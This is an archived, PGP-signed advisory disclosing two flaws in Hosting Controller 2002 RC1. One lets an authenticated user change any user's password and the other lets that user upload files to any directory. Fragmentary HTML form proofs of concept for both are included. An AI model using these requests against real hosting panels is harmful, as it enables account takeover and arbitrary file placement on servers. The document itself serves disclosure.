TUCoPS :: Web :: General :: b06-1355.htm

Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC)
Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC)
Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC)



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
i've found 2 vulnerabilities in Hosting Controller that allows remote
authenticated users to change every user password or upload files in every
directory. Here are the PoC:

This allows to modify passwords:
action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser " method="post"> Username:
Name:
ChangePass (type true):
Password:
Confirm:

PS: You should have authenticated access.

- -------------------------
Vulnerable versions:
- - HC 2002 RC 1
Other versions may be vulnerable And this allows to upload:
action="http://[URL]/admin/folders/saveuploadfiles.asp" enctype="multipart/form-data"> Where upload files:
File 1:
File 2:
File 3:
File 4:



PS: If you see an error message, it's not important. You just should have authenticated access.

- -------------------------
Vulnerable versions:
- - HC 2002 RC 1
Other versions may be vulnerable This vulns are tested with HC 2002 RC 1, but other versions may be vulnerable. Sorry for my english, but i'm Italian. -----BEGIN PGP SIGNATURE----- Version: 6.5.8ckt http://www.ipgpp.com/ iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh KUkiwb7H3FkEdfZcORRpl4LH =qlwF -----END PGP SIGNATURE-----

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH